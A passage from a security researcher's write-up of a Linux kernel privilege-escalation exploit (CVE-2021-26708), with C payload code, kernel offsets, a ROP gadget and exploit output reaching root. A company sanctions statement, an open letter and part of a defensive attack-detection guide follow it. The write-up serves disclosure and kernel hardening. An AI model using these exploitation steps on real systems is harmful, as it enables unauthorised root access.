Another option is to free the address from RCX. I started to search for a 64-byte kernel object that is interesting for use-after-free (containing kernel pointers, for example). Moreover, the exploit in the userspace should somehow make the kernel put that object at the location of the freed virtio_vsock_sock. Searching for a kernel object to fit these requirements was an enormous pain! I even used the input corpus of my fuzzer and automated that search.

In parallel, I was learning the internals of System V message implementation, since I had already used msg_msg for heap spraying in this exploit. And then I got an insight on how to exploit use-after-free on msg_msg.

Achieving arbitrary read

The kernel implementation of a System V message has a maximum size of DATALEN_MSG, which is PAGE_SIZE minus sizeof(struct msg_msg). If you send a bigger message, the remainder is saved in a list of message segments. The msg_msg structure has struct msg_msgseg *next, which points to the first segment, and size_t m_ts, which stores the whole size.
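Assuming a 4096-byte PAGE_SIZE and the 48-byte header shown earlier, the split between inline data and segments works out as follows (a sketch of the arithmetic, not kernel code):

```c
#include <stddef.h>

#define PAGE_SIZE_ASSUMED 4096UL
#define MSG_MSG_SZ        48UL
#define DATALEN_MSG       (PAGE_SIZE_ASSUMED - MSG_MSG_SZ)

/* Bytes of a message of size len stored inline after the msg_msg header */
size_t inline_bytes(size_t len)
{
    return len < DATALEN_MSG ? len : DATALEN_MSG;
}

/* Bytes that spill into the list of msg_msgseg segments */
size_t segment_bytes(size_t len)
{
    return len > DATALEN_MSG ? len - DATALEN_MSG : 0;
}
```

For example, a 6096-byte message keeps 4048 bytes inline and puts the remaining 2048 bytes into segments.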

Cool! I can put the controlled values in msg_msg.m_ts and msg_msg.next when I overwrite the message after executing arbitrary free for it:


Note that I don't overwrite msg_msg.security, in order to avoid breaking SELinux permission checks. That is possible using the wonderful setxattr() & userfaultfd() heap spraying technique by Vitaly Nikolenko. Tip: I place the spraying payload at the border of the page faulting memory region so that copy_from_user() hangs just before overwriting msg_msg.security. See the code preparing the payload:

#define PAYLOAD_SZ 40

void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
{
    struct msg_msg *msg_ptr;

    xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;

    /* Don't touch the second part to avoid breaking page fault delivery */
    memset(spray_data, 0xa5, PAGE_SIZE * 4);

    printf("[+] adapt the msg_msg spraying payload:\n");
    msg_ptr = (struct msg_msg *)xattr_addr;
    msg_ptr->m_type = 0x1337;
    msg_ptr->m_ts = ARB_READ_SZ;
    msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
    printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
           msg_ptr,
           msg_ptr->m_type, &(msg_ptr->m_type),
           msg_ptr->m_ts, &(msg_ptr->m_ts),
           msg_ptr->next, &(msg_ptr->next));
}

But how do we read the kernel data using this crafted msg_msg? Receiving this message requires manipulations with the System V message queue, which breaks the kernel because the msg_msg.m_list pointer is invalid (0xa5a5a5a5a5a5a5a5 in my case). My first idea was setting this pointer to the address of another good message, but that caused the kernel to hang because the message list traversal can't finish.

Reading the documentation for the msgrcv() syscall helped to find a better solution: I used msgrcv() with the MSG_COPY flag:

MSG_COPY (since Linux 3.8)
        Nondestructively fetch a copy of the message at the ordinal position in the queue
        specified by msgtyp (messages are considered to be numbered starting at 0).


This flag makes the kernel copy the message data to the userspace without removing it from the message queue. Nice! MSG_COPY is available if the kernel has CONFIG_CHECKPOINT_RESTORE=y, which is true for Fedora Server.

Arbitrary read: step-by-step procedure

Here is the step-by-step procedure that my exploit uses for arbitrary read of kernel memory:

1.   Make preparations:

·     Count CPUs available for racing using sched_getaffinity() and CPU_COUNT() (the exploit needs at least two).

·     Open /dev/kmsg for parsing.

·     mmap() the spray_data memory area and configure userfaultfd() for the last part of it.

·     Start a separate pthread for handling userfaultfd() events.

·     Start 127 pthreads for setxattr() & userfaultfd() heap spraying over msg_msg and hang them on a pthread_barrier.


2.   Get the kernel address of a good msg_msg:

·     Win the race on a virtual socket, as described earlier.

·     Wait for 35 microseconds in a busy loop after the second connect().

·     Call msgsnd() for a separate message queue; the msg_msg object is placed at the virtio_vsock_sock location after the memory corruption.

·     Parse the kernel log and save the kernel address of this good msg_msg from the kernel warning (RCX register).

·     Also, save the kernel address of the vsock_sock object from the RBX register.


3.   Execute arbitrary free against good msg_msg using a corrupted msg_msg:

·     Use four bytes of the address of good msg_msg for SO_VM_SOCKETS_BUFFER_SIZE; that value will be used for the memory corruption.

·     Win the race on a virtual socket.

·     Call msgsnd() right after the second connect(); the msg_msg is placed at the virtio_vsock_sock location and corrupted.

·     Now the security pointer of the corrupted msg_msg stores the address of the good msg_msg (from step 2).



 

·     If the memory corruption of msg_msg.security from the setsockopt() thread happens during msgsnd() handling, then the SELinux permission check fails.

·     In that case, msgsnd() returns -1 and the corrupted msg_msg is destroyed; freeing msg_msg.security frees the good msg_msg.


4.   Overwrite the good msg_msg with a controlled payload:

·     Right after a failed msgsnd() the exploit calls pthread_barrier_wait(), which wakes 127 spraying pthreads.

·     These pthreads execute setxattr() with a payload that has been prepared with adapt_xattr_vs_sysv_msg_spray(vsock_kaddr), described earlier.

·     Now the good msg_msg is overwritten with the controlled data and msg_msg.next pointer to the System V message segment stores the address of the vsock_sock object.


 

5.  Read the contents of the vsock_sock kernel object to the userspace by receiving a message from the message queue that stores the overwritten msg_msg:

ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
             IPC_NOWAIT | MSG_COPY | MSG_NOERROR);


This part of the exploit is very reliable.

Sorting the loot

Now my "weapons" had given me some good loot: I got the contents of the vsock_sock kernel object. It took me some time to sort it out and find good attack targets for further exploit steps.


 Here's what I found inside:

·     Plenty of pointers to objects from dedicated slab caches, such as PINGv6 and sock_inode_cache. These are not interesting.

·     struct mem_cgroup *sk_memcg pointer living in vsock_sock.sk at offset 664. The mem_cgroup structure is allocated in the kmalloc-4k slab cache. Good!

·     const struct cred *owner pointer living in vsock_sock at offset 840. It stores the address of the credentials that I want to overwrite for privilege escalation.

·     void (*sk_write_space)(struct sock *) function pointer in vsock_sock.sk at offset 688. It is set to the address of the sock_def_write_space() kernel function. That can be used for calculating the KASLR offset.

Here is how the exploit extracts these pointers from the memory dump:

#define MSG_MSG_SZ              48
#define DATALEN_MSG             (PAGE_SIZE - MSG_MSG_SZ)
#define SK_MEMCG_OFFSET         664
#define SK_MEMCG_RD_LOCATION    (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET       840
#define OWNER_CRED_RD_LOCATION  (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET   688
#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET)

/*
 * From Linux kernel 5.10.11-200.fc33.x86_64:
 *   function pointer for calculating KASLR secret
 */
#define SOCK_DEF_WRITE_SPACE    0xffffffff819851b0lu

unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;

/* ... */

    sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
           sk_memcg, SK_MEMCG_RD_LOCATION);

    owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
           owner_cred, OWNER_CRED_RD_LOCATION);

    sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
           sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);

    kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
    printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);
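As a cross-check, these macros place the leaked pointers at fixed offsets in the dump; with an assumed PAGE_SIZE of 4096, the arithmetic gives 4712, 4888, and 4736, the same offsets that appear in the exploit output:

```c
#define PAGE_SIZE_ASSUMED 4096
#define MSG_MSG_SZ        48
#define DATALEN_MSG       (PAGE_SIZE_ASSUMED - MSG_MSG_SZ)

/* Offset of a vsock_sock field inside the leaked dump: the first
 * DATALEN_MSG bytes come from the inline msg_msg data, and the fake
 * segment pointer makes the rest come from vsock_sock itself. */
int rd_location(int field_offset)
{
    return DATALEN_MSG + field_offset;
}
```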

The cred structure is allocated in the dedicated cred_jar slab cache. Even if I execute my arbitrary free against it, I can't overwrite it with the controlled data (or at least I don't know how to). That's too bad, since it would be the best solution.

So I focused on the mem_cgroup object. I tried to call kfree() for it, but the kernel panicked instantly. Looks like the kernel uses this object quite intensively, alas. But here I remembered my good old privilege escalation tricks.

Use-after-free on sk_buff

When I exploited CVE-2017-2636 in the Linux kernel back in 2017, I turned double free for a kmalloc-8192 object into use-after-free on sk_buff. I decided to repeat that trick.

A network-related buffer in the Linux kernel is represented by struct sk_buff. This object has skb_shared_info with destructor_arg, which can be used for control flow hijacking. The network data and skb_shared_info are placed in the same kernel memory block pointed to by sk_buff.head. Hence creating a 2800-byte network packet in the userspace will make skb_shared_info be allocated in the kmalloc-4k slab cache, where mem_cgroup objects live as well.

So I implemented the following procedure:

1.   Create one client socket and 32 server sockets using socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP).

2.   Prepare a 2800-byte buffer in the userspace and do memset() with 0x42 for it.

3.   Send this buffer from the client socket to each server socket using sendto(). That creates sk_buff objects in kmalloc-4k. Do that on each available CPU using sched_setaffinity() (this is important because slab caches are per-CPU).

4.   Perform the arbitrary read procedure for vsock_sock (described earlier).

5.   Calculate the possible sk_buff kernel address as sk_memcg plus 4096 (the next element in kmalloc-4k).

6.   Perform the arbitrary read procedure for this possible sk_buff address.

7.   If 0x4242424242424242lu is found at the location of network data, then the real sk_buff is found, go to step 8. Otherwise, add 4096 to the possible sk_buff address and go to step 6.

8.   Start 32 pthreads for setxattr() & userfaultfd() heap spraying over sk_buff and hang them on a pthread_barrier.

9.   Perform arbitrary free against the sk_buff kernel address.

10.      Call pthread_barrier_wait(), which wakes 32 spraying pthreads that execute setxattr() overwriting skb_shared_info.

11.      Receive the network messages using recv() for the server sockets.
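The search over kmalloc-4k in steps 5–7 boils down to a simple scan, sketched here as a pure function over values read back via the arbitrary read primitive (a model, not the exploit's actual code):

```c
#include <stdint.h>

#define SKB_STEP   4096UL
#define SKB_MARKER 0x4242424242424242UL

/* Model of the sk_buff search: candidates[i] holds the first 8 bytes
 * of network data read back at address sk_memcg + (i + 1) * SKB_STEP.
 * Returns the matching candidate address, or 0 if none is found. */
uint64_t find_skb(uint64_t sk_memcg, const uint64_t *candidates, int n)
{
    for (int i = 0; i < n; i++)
        if (candidates[i] == SKB_MARKER)
            return sk_memcg + (i + 1) * SKB_STEP;
    return 0;
}
```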

When the sk_buff object with overwritten skb_shared_info is received, the kernel executes the destructor_arg callback, which performs an arbitrary write of kernel memory and escalates user privileges. How? Keep reading!

I should note that this part, with use-after-free on sk_buff, is the exploit's main source of instability. It would be nice to find a better kernel object that can be allocated in kmalloc-* slab caches and exploited for turning use-after-free into arbitrary read/write of kernel memory.

Arbitrary write with skb_shared_info

Let's look at the code that prepares the payload for overwriting the sk_buff object:

#define SKB_SIZE                4096
#define SKB_SHINFO_OFFSET       3776
#define MY_UINFO_OFFSET         256
#define SKBTX_DEV_ZEROCOPY      (1 << 3)

void prepare_xattr_vs_skb_spray(void)
{
    struct skb_shared_info *info = NULL;

    xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;

    /* Don't touch the second part to avoid breaking page fault delivery */
    memset(spray_data, 0x0, PAGE_SIZE * 4);

    info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
    info->tx_flags = SKBTX_DEV_ZEROCOPY;
    info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;

    uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);


The skb_shared_info structure resides in the sprayed data exactly at the offset SKB_SHINFO_OFFSET, which is 3776 bytes. The skb_shared_info.destructor_arg pointer stores the address of struct ubuf_info. I create a fake ubuf_info at MY_UINFO_OFFSET in the network buffer itself. This is possible since the kernel address of the attacked sk_buff is known. Here is the payload layout:


 Now about the destructor_arg callback:

    /*
     * A single ROP gadget for arbitrary write:
     *   mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
     * Here rdi stores uinfo_p address, rcx is 0, rsi is 1
     */
    uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
    uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
    uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */

I invented a very strange arbitrary write primitive that you can see here. I couldn't find a stack pivoting gadget in vmlinuz-5.10.11-200.fc33.x86_64 that would work with my constraints… so I performed arbitrary write in one shot :)


The callback function pointer stores the address of a single ROP gadget. The RDI register stores the first argument of the callback function, which is the address of ubuf_info itself. So RDI + 8 points to ubuf_info.desc. The gadget moves ubuf_info.desc to RDX. Now RDX contains the address of the effective user ID and group ID, minus one byte. That byte is important: when the gadget writes qword with 1 from RSI to the memory pointed to by RDX, the effective uid and gid are overwritten by zeros.

Then the same procedure is repeated for uid and gid. Privileges are escalated to root. Game over.
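The effect of the gadget's store can be simulated in plain userspace C (a model with a hypothetical 16-byte layout where euid sits at offset 1 and egid right after it; real struct cred offsets differ):

```c
#include <stdint.h>
#include <string.h>

/* Simulate the gadget's store: mov qword ptr [rdx], rsi with rsi = 1
 * and rdx = &euid - 1. The 0x01 byte lands in the byte before euid,
 * and the seven zero bytes wipe euid and (almost all of) egid. */
void gadget_store(uint8_t *mem, size_t desc_off)
{
    uint64_t one = 1;
    memcpy(mem + desc_off, &one, sizeof(one)); /* little-endian x86_64 */
}

/* Returns 1 if both IDs end up as 0 (root) after the simulated write.
 * The most significant byte of egid survives, which is fine when the
 * original gid is a small number like 1000. */
int escalates(uint32_t euid, uint32_t egid)
{
    uint8_t cred[16] = {0};
    memcpy(cred + 1, &euid, 4); /* euid at offset 1 in this model */
    memcpy(cred + 5, &egid, 4); /* egid at offset 5 in this model */
    gadget_store(cred, 0);      /* desc points one byte before euid */
    memcpy(&euid, cred + 1, 4);
    memcpy(&egid, cred + 5, 4);
    return euid == 0 && egid == 0;
}
```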

Exploit output that displays the whole procedure:

[a13x@localhost ~]$ ./vsock_pwn

 

=================================================

==== CVE-2021-26708 PoC exploit by a13xp0p0v ====

=================================================

 

[+] begin as: uid=1000, euid=1000

[+] we have 2 CPUs for racing

[+] getting ready...

[+] remove old files for ftok()

[+] spray_data at 0x7f0d9111d000

[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000

[+] fault_handler for uffd 38 is ready

 

[+] stage I: collect good msg_msg locations

[+] go racing, show wins:

        save msg_msg ffff9125c25a4d00 in msq 11 in slot 0

        save msg_msg ffff9125c25a4640 in msq 12 in slot 1

        save msg_msg ffff9125c25a4780 in msq 22 in slot 2

        save msg_msg ffff9125c3668a40 in msq 78 in slot 3

 

[+] stage II: arbitrary free msg_msg using corrupted msg_msg

        kaddr for arb free: ffff9125c25a4d00

        kaddr for arb read: ffff9125c2035300

[+] adapt the msg_msg spraying payload:

        msg_ptr 0x7f0d91120fd8

        m_type 1337 at 0x7f0d91120fe8

        m_ts 6096 at 0x7f0d91120ff0

        msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8

[+] go racing, show wins:

 

[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)

[+] msgrcv returned 6096 bytes

[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)

[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)

[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)

[+] Calculated kaslr offset: 2a000000

 

[+] stage IV: search sprayed skb near sk_memcg...

[+] checking possible skb location: ffff9125c42fa000

[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg

        kaddr for arb free: ffff9125c25a4640

        kaddr for arb read: ffff9125c42fa030

[+] adapt the msg_msg spraying payload:

        msg_ptr 0x7f0d91120fd8

        m_type 1337 at 0x7f0d91120fe8

        m_ts 6096 at 0x7f0d91120ff0

        msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8

[+] go racing, show wins: 0 0 20 15 42 11

[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)

[+] msgrcv returned 6096 bytes

[+] found a real skb

 

[+] stage V: try to do UAF on skb at ffff9125c42fa000

[+] skb payload:

        start at 0x7f0d91120004

        skb_shared_info at 0x7f0d91120ec4

        tx_flags 0x8

        destructor_arg 0xffff9125c42fa100

        callback 0xffffffffab64f6d4

        desc 0xffff9125c3fd6e53

[+] go racing, show wins: 15

 

[+] stage VI: repeat UAF on skb at ffff9125c42fa000

[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30

 

[+] finish as: uid=0, euid=0

[+] starting the root shell...

uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Possible exploit mitigations

Several technologies could prevent exploitation of CVE-2021-26708 or at least make it harder.

1.   Exploiting this vulnerability is impossible with the Linux kernel heap quarantine, since the memory corruption happens very shortly after the race condition. Read about my SLAB_QUARANTINE prototype in a separate article.

2.   MODHARDEN from the grsecurity patch prevents kernel module autoloading by unprivileged users.

3.   Setting /proc/sys/vm/unprivileged_userfaultfd to 0 would block the described method of keeping the payload in the kernelspace. That toggle restricts userfaultfd() to only privileged users (with the CAP_SYS_PTRACE capability).

4.   Setting kernel.dmesg_restrict sysctl to 1 would block infoleak via the kernel log; that sysctl restricts the ability of unprivileged users to read the kernel syslog via dmesg.

5.   Control Flow Integrity could prevent calling my ROP gadget. You can see these technologies on the Linux Kernel Defence Map that I maintain.

6.   Hopefully, future versions of the Linux kernel will have support for the ARM Memory Tagging Extension (MTE) to mitigate use-after-free on ARM.

7.   I have heard rumors of a grsecurity Wunderwaffe called AUTOSLAB. We don't know much about it. Presumably, it makes Linux allocate kernel objects in separate slab caches depending on the object type. That could ruin the heap spraying technique that I use heavily in this exploit.

Closing words

Investigating and fixing CVE-2021-26708 and developing the PoC exploit was an interesting and exhausting journey.

I managed to turn a race condition with very limited memory corruption into arbitrary read/write of kernel memory and privilege escalation on Fedora 33 Server for x86_64, bypassing SMEP and SMAP. During this research, I've created several new vulnerability exploitation tricks for the Linux kernel.


I believe writing this article is important for the Linux kernel community as a way to come up with new ideas for improving kernel security. I hope you have enjoyed reading it!

And, of course, I thank Positive Technologies for giving me the opportunity to work on this research.

Author: Alexander Popov, Positive Technologies

Positive Technologies' official statement following U.S. sanctions


As a company, we reject the groundless accusations made by the U.S. Department of the Treasury. In the almost 20 years we have been operating, there has been no evidence that the results of Positive Technologies' research have been used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.

Our global mission is to create products and technologies to improve cybersecurity around the world and to ensure conditions for the most efficient prevention of cyberattacks for the benefit of society, business, and government agencies. We do this regardless of the geopolitical situation, with maximum openness and a focus on cooperation, including international cooperation.

Our technologies are used around the world, with thousands of companies in various fields of business as well as the government agencies of different countries trusting us to keep them safe. We have over 1,100 employees and earned RUB 5.6 billion according to the Russian Accounting Standards ($73 million) in 2020 (an increase of 55 percent from 2019). Over the last five years, our average growth has been 41 percent. We have been regularly rated by international research and advisory agencies as one of the fastest growing visionary companies that develop security and vulnerability management solutions.

Despite the fact that we are not a public company, the market estimates our capitalization at several billion dollars. This demonstrates the level of interest in our technologies and a serious level of trust in the company. To maintain this trust, we adhere to the principles of maximum openness at all levels of our activities: from research to business, including the company's financial statements.

We are known to the global cybersecurity community as visionaries and leaders in ethical security research. Our researchers detect hundreds of zero-day vulnerabilities per year in IT systems of various classes and types. All of the vulnerabilities found, without exception, are provided to the software manufacturers under our responsible disclosure policy and are not made public until the necessary updates are released. Each such piece of research is highly valued by the system manufacturers and is used to improve the information security of their final products.

The traditions of transparency and openness are also reflected in Positive Hack Days, a forum that we have been holding since 2011. PHDays is a public platform for the exchange of expertise, learning, and advanced training in cybersecurity. Every year the forum attracts thousands of cybersecurity and business experts from different countries, representatives of the CTF movement, scientists, students, and even schoolchildren. Because of the pandemic, we have switched to a hybrid format, so everything that happens at PHDays can be viewed by a wide audience online. We also provide simultaneous interpretation into English so that anyone, anywhere in the world, can watch a presentation of interest to them. The event is fully open for anyone to watch and participate in.

We truly think that geopolitics should not be a barrier to the technological development of society and we will continue to do what we do best—to protect and ensure cybersecurity around the world. That is why we continue to work under normal conditions, in full compliance with all of our obligations to our customers, partners, and employees.

Open letter to the research community




Dear all,

In light of recent events, we have received many words of encouragement in comments on social media, through direct messages, and over the phone. We truly appreciate your support. It means a lot to us.

Over the years, we have detected and helped fix a huge number of vulnerabilities in applications and hardware from almost all renowned vendors, such as Cisco, Citrix, Intel, Microsoft, Siemens, and VMware.

All this would be impossible without close collaboration with the best infosec researchers, or without vendors' proactive approach and willingness to cooperate with research centers like ours in fixing all detected vulnerabilities. In line with the responsible disclosure policy, we only announce new vulnerabilities by agreement with vendors, and only after the vendor itself confirms it has fixed the bug and delivered the patch to customers.

We believe this approach makes our world better and more secure.

To unite our community, we started Positive Hack Days (PHDays), the biggest international security forum in Russia. Cybersecurity specialists and business leaders now have an opportunity to connect with white hats and cybersecurity geeks who know firsthand what a true pentest is and are willing to share their experience.

To gain more practical knowledge on how cybercriminals operate in actual life, every year for more than a decade now, we have held The Standoff, an attackers-vs-defenders cyberbattle set in a real-world environment. Only this way, under hyper-realistic conditions, is it possible to learn how infrastructure components can be attacked and how to protect them. The Standoff and PHDays threw their doors open to capture-the-flag (CTF) teams from many countries, including Russia, the U.S., Kazakhstan, India, Japan, and the UAE. Even the world’s top CTF teams, such as PPP, Carnegie Mellon University's competitive hacking team, have sharpened their skills in cyberexercises at The Standoff cyber-range.

Following our principle of open knowledge for the community, we made the event available to everyone. All-comers could watch videos of interesting talks, try their hand at detecting vulnerabilities or warding off a cyberattack, as well as freely monitor the cyberbattle traffic and take this expertise away with them so as to better protect their companies, develop efficient antihacker products, and create securer solutions and components.

Openness of information and knowledge, responsible disclosure, and a hands-on approach to cybersecurity are our key values. As such, we cannot but promise hot new infosec research, continued wide support for the community, and a host of new interesting conferences.

Thank you very much for your support, and see you all at PHDays 10!

Please also go check out our collection of best infosec findings in the past three years, and share it with your colleagues.

Denis Baranov,

Managing Director, Head of Research Department at Positive Technologies


How to detect a cyberattack and prevent money theft

Money theft is one of the most significant risks for any organization, regardless of its field of activity. According to our data, 42% of cyberattacks on companies are carried out for direct financial gain. An attack can be detected at various stages, from network penetration to the moment the attackers start withdrawing money. In this article, we will show how to detect an attack at each stage and minimize the risk, and analyze two common scenarios of such attacks: manual money theft using remote control programs, and theft using specialized malware, namely a banking trojan.


Where to look for signs of the attack

Penetration into the company's network


Phishing emails


Most often, attackers get into the local network by sending phishing emails with malicious attachments. According to our data, this is how 9 out of 10 APT groups start their attack. 

In most cases, phishing emails carry a document with a .doc, .docx, .xls, or .xlsx extension containing one of the following payload types:

       A VBA or Excel 4.0 macro

       An exploit for a vulnerability in a Microsoft Office component, such as CVE-2017-0199, CVE-2017-11882, or CVE-2018-0802

Before running the document, you should first perform static analysis, which can show whether the file is malicious. There are quite a few approaches to detection: using exact file hashes (MD5, SHA1, SHA256) or more flexible fuzzy hashes such as SSDEEP. In the simplest case, you can extract ASCII and Unicode strings from the file. The most reliable approach, however, is analyzing code fragments, which can reveal characteristic operation sequences and encryption features.
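The static pass described above can be sketched in a few lines. This is a minimal illustration, not a detection engine: `triage_file` (a hypothetical helper name) computes the exact hashes and does a rough "strings" extraction over a byte buffer.

```python
import hashlib
import re

def triage_file(data: bytes) -> dict:
    """Compute exact hashes and pull printable ASCII strings from a sample."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        # Printable ASCII runs of 6+ characters, a rough "strings" pass
        "strings": [s.decode() for s in re.findall(rb"[ -~]{6,}", data)],
    }

# Example: a fake "document" containing a suspicious command string
sample = b"\x00\x01cmd.exe /c echo hello\x00\xffregsvr32 /u /n /s\x00"
r = triage_file(sample)
```

In practice the extracted strings would be matched against indicator lists, and the hashes checked against threat intelligence feeds.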

However, static analysis does not always help detect suspicious files. A more reliable way is to run the file in a sandbox, where its behavior is analyzed. 

As a result of launching a malicious file, a subprocess is usually created in the context of an office application. Calls to create a new process in user space, such as CreateProcessA or CreateProcessW, are intercepted at the kernel level by calling NtCreateUserProcess or NtCreateProcessEx. But launching a process with a malicious payload can take place in other ways:

    Creating a task in the task scheduler. As a rule, task creation can be detected by several characteristic actions.

First, new keys with the task properties appear in the registry branch HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree. Second, new task files appear in the directories C:\Windows\Tasks and C:\Windows\System32\Tasks. Third, entries about the creation of a scheduled task appear in the event logs (events with ID 4698). Moreover, attackers can not only create a task but also change an existing one; in that case, the log events will have ID 4702.

There is another technique: tracking access to, and interaction with, the COM interface 0F87369F-A4E5-4CFC-BD3E-73E6154572DD, because this is what schtasks.exe, the standard Windows console utility for creating tasks, does. Attackers often use it.


        Creating a service. The fact of creating a new service can be detected by the appearance of additional keys in the registry branches HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services and HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\LEGACY_*. In the Windows event logs, the creation of the service will correspond to entries with the ID 4697 or 7045. In addition, you can track the RPC call to the interface 367ABB81-9844-35F1-AD32-98F038001003 of the RPC server \PIPE\svcctl.


        Autorun via the startup directory or registry. In the first case, a file is written to the %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup or %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup directory. In the second case, the relevant registry keys are HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, and others (the detection of this technique is discussed in detail in the Persistence section).

New files in the system and the memory of the created processes also need to be scanned for malicious code.

Attack on the web application

Another common method of hacking is exploiting a vulnerability in a web application on the company's perimeter. The results of pentesting projects conducted by our experts show that in 86% of companies there is at least one way to get into the internal network through a vulnerable web application.

It is necessary to track suspicious process launches using Windows security log events with ID 4688 or Sysmon log events with ID 1. For example, launching the cmd.exe command line with w3wp.exe (the OWA service) as its parent process is suspicious. You should also monitor the creation of new processes on behalf of the user who started the process responsible for running the attacked service.
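A rule of this kind reduces to a parent/child check over parsed process-creation events. The sketch below assumes hypothetical event records with `parent_image` and `image` fields (modeled on Sysmon event 1); the sets of web workers and shells are illustrative, not exhaustive.

```python
# Assumed web-server worker processes and interactive shells
SUSPICIOUS_PARENTS = {"w3wp.exe", "httpd.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

def is_suspicious_spawn(event: dict) -> bool:
    """Flag a shell spawned by a web-server worker process."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    child = event["image"].rsplit("\\", 1)[-1].lower()
    return parent in SUSPICIOUS_PARENTS and child in SHELLS

evt = {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
       "image": r"C:\Windows\System32\cmd.exe"}
```

A real rule would also consider the user context, as noted above, since web-shell commands run under the account of the attacked service.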

The successful exploitation of the vulnerability and uploading of the web shell can be indicated by the events of creating files with certain extensions, for example .asmx, .jsp, .php, and .aspx in the file directories of running services.

Network traffic analysis allows you to identify known techniques for exploiting vulnerabilities (for example, Path Traversal) or signs of using specific exploits. To detect the exploitation of unknown vulnerabilities, you need to monitor suspicious activity, for example, the presence of console utility launch strings or console utility data output patterns in the traffic. Such traffic may indicate the use of a web shell, which is often the next step after successfully exploiting a vulnerability. Another anomaly may be multiple requests containing incorrect data originating from a limited number of external addresses. 

Figure 1. String with the request to read the file /etc/passwd

Password spraying for available services

The third method is bruteforcing credentials for services available on the perimeter. If an attacker tries to bruteforce the password of a single account, the attack will quickly be noticed and the account will be locked out. Therefore, criminals are more likely to resort to password spraying, an attack in which one common password is tried against many accounts.

A password spraying attack can be detected by monitoring the event logs. To do this, you need to track the following events in the security event log:

    4625 "An account failed to log on" from hosts having services installed that are available on the network perimeter, such as OWA

    4771 "Kerberos pre-authentication failed" with the error code 0x6 "Client not found in Kerberos database" and 0x18 "Pre-authentication information was invalid"

    4776 "The computer attempted to validate the credentials for an account" in the case of NTLM authentication, with error codes C0000064 "Username does not exist" and C000006A "Username correct but password invalid"

For events 4625, it is possible to detect the address from which the password spraying attack is carried out, so the detection logic is based on searching for multiple triggers from the same IP address, but for different users. Events 4776 and 4771 appear on the domain controller and will have the addresses of the hosts where the services are located as the source address. In this case, you need to track multiple failed authentication attempts with different accounts over a certain period of time, such as 30 seconds.

Figure 2. Example of event 4771 with error code 0x18

For details on how to detect a password spraying attack in network traffic, see the full version of the research.
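The detection logic for events 4625 described above can be sketched as follows. The record format `(timestamp, source IP, username)` and the thresholds are assumptions for illustration; the key idea is the same as in the text: many distinct accounts failing from one address within a short window.

```python
from collections import defaultdict

def detect_spraying(events, window=30, min_users=5):
    """Group failed-logon records by source IP and flag IPs that tried
    at least min_users distinct accounts within `window` seconds."""
    flagged = set()
    by_ip = defaultdict(list)
    for ts, ip, user in events:
        by_ip[ip].append((ts, user))
    for ip, recs in by_ip.items():
        recs.sort()
        for ts, _ in recs:
            users = {u for t, u in recs if ts <= t <= ts + window}
            if len(users) >= min_users:
                flagged.add(ip)
                break
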